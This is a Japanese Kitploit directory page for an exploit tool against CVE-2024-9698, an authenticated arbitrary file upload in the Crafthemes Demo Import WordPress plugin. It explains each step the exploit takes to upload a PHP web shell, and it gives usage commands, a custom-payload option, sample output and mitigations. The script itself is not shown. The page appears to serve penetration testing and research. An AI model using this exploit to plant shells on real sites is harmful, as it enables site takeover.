Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9698 — Crafthemes Demo Import <= 3.3 - 認証済み(管理者+)任意ファイルアップロード(process_uploaded_files 内) | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-9698
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubnxploited/cve-2024-9698

CVE-2024-9698

Crafthemes Demo Import <= 3.3 - 認証済み(管理者+)任意ファイルアップロード(process_uploaded_files 内)

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-9698

Crafthemes Demo Import <= 3.3 - 任意ファイルアップロードエクスプロイト

📌 概要

このエクスプロイトは、WordPress用プラグイン Crafthemes Demo Import の重大な脆弱性 (CVE-2024-9698) を狙います。この脆弱性により、認証された管理者が影響を受けるWordPressサイトに任意のファイルをアップロードできるようになり、潜在的なリモートコード実行 (RCE) につながる可能性があります。

🔍 脆弱性の詳細

  • プラグイン: Crafthemes Demo Import
  • 影響を受けるバージョン: ≤ 3.3
  • CVE ID: CVE-2024-9698
  • 重大度: 高 (CVSS スコア: 7.2)
  • 脆弱性のある関数: process_uploaded_files
  • 問題: このプラグインには適切なファイルタイプ検証がなく、管理者が悪意のあるPHPファイルをサーバーにアップロードできるようになります。
  • 潜在的な影響: 攻撃者は任意のコマンドを実行することで、ウェブサイトの完全な制御を取得できる可能性があります。

🎯 悪用

✅ 前提条件

  • WordPress 管理者の資格情報がこの脆弱性を悪用するために必要です。

🚀 動作の仕組み

  1. 脆弱性の確認: スクリプトはまず readme.txt から情報を抽出してプラグインのバージョンをチェックします。
  2. WordPressへのログイン: 管理者として認証し、セッションCookieを取得します。
  3. ノンストークンの抽出: AJAXリクエストに必要なノンストークンを解析します。
  4. 悪意のあるファイルのアップロード: admin-ajax.php を使用してカスタムPHPシェルをアップロードします。
  5. アップロードの確認: アップロードの成功を確認し、シェルのURLを表示します。

🛠️ 使用方法

root@kitploit:~
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"

📝 カスタムペイロード

カスタムPHPペイロードをアップロードする場合は、次のようにします:

root@kitploit:~
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"

🔥 出力例

root@kitploit:~
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php

🛡️ 対策

  • プラグインを更新して、可能であればパッチ済みバージョンにします。
  • 管理者アクセスを信頼できるユーザーに制限します。
  • アップロードされたファイルを監視および監査します。

免責事項: このスクリプトは教育およびセキュリティ研究の目的のみに使用されることを意図しています。明示的な許可なくシステムに対して不正に使用することは違法です。

ツールをダウンロード